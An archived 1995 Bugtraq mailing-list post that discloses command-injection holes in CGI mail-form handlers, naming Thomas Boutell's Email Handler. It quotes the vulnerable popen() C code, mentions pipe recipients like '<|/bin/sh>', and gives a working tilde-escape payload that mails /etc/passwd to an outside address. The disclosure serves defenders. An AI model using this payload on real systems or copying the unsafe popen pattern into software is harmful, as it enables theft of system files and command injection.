[2082] in bugtraq
More holes, was: Re: SECURITY HOLE: FormMail
daemon@ATHENA.MIT.EDU (Ivo)
Sat Aug 5 14:24:56 1995
Date: Sat, 5 Aug 1995 13:53:21 +0200
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: Ivo <ivo@nijenrode.nl>
X-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To: Your message of "Fri, 04 Aug 1995 16:44:05 PDT."
<199508042344.QAA20408@Csli.Stanford.EDU>
In message <199508042344.QAA20408@Csli.Stanford.EDU> Christian Wettergren write
s
>| Just to be helpful, the way to do it more safely, without massive
>| need for checking is to build a complete mail message, including
>| header, and hand that to "sendmail -t" which then reads the recipient
>| information out of the constructed header. [Sendmail should of course
>| be an invocation of smail or pp, not the BSD program of that name,
>| given the history of problems that has had]
>
>I suspect this still wont take care of emails to pipes or files,
>i.e <|/bin/sh> or </.rhosts>, it is a legitimate, albeit unexpected,
>mail-command going to sendmail. So unless these two mode are totally
>stripped out of the sendmail, there will exist a vulnerability there,
>wont it?
I've written an email-cgi package myself, and for this package I've used
a simple smtp client written by Wietse Venema. I've been familiar with bugs
like tilde-escapes etc. for a while, and this smtp client does not have
any fancy switches, escapes, options etc.
Ok, of course you should not use popen() or system() (C) or open/syste, (perl)
(at least not withouth filtering out '|;' etc), but fork combined with
execve works fine and secure.
You can find smtp.c in the wwwutils package at
ftp://ftp.win.tue.nl/pub/infosystems/www/wwwutils.tar.gz
or directly at
ftp://ftp.nijenrode.nl/pub/people/ivo/smtp.c
Also (perhaps someone already reported this), Thomas Boutell's Email Handler
(http://siva.cshl.org/email/index.html)
seems to suffer from this problem. I've reported this a very long time ago
to him, but it seems he hasn't fixed it. Thomas Boutell is maintainer of
the WWW-FAQ, and he refers to his handler in it, so it *might* be that
a lot of people are using it! Here's a piece of code from email.c:
sprintf(buf, "/usr/bin/mail %s", entries[recipientid].val);
out = popen(buf, "w");
fprintf(out, "Subject: %s\n", entries[subjectid].val);
fprintf(out, "Reply-To: %s\n", entries[emailid].val);
fprintf(out, "Supposedly-From: %s\n", entries[nameid].val);
fprintf(out, "[This message was sent through the www-email gateway.]\n");
fprintf(out, "--\n");
fprintf(out, "%s\n", entries[contentid].val);
pclose(out);
The popen() here doesn't seem to be insecure, the cgi first checks the
recipient against a list of users which are defined in a local configfile
(which location is hardcoded into the source).
However, this program directly sends the entire message to /usr/bin/mail,
including ~-escapes. I've been able to send myself, using this program,
a copy of the passwd file by simply typing
~!/bin/mail ivo@nijenrode.nl < /etc/passwd
in the message-entry of the form. This was on AIX 2.3.
Happy hacking,
Ivo
------------------------------------------------------------------------
Name: Ivo van der Wijk | It won't give up it wants me dead
Internet: ivo@nijenrode.nl | this goddamn noise inside my head
Aka: www@nijenrode.nl |
IRC: VladDrac | |\|||/|
URL: http://www.nijenrode.nl/~ivo
------------------------------------------------------------------------
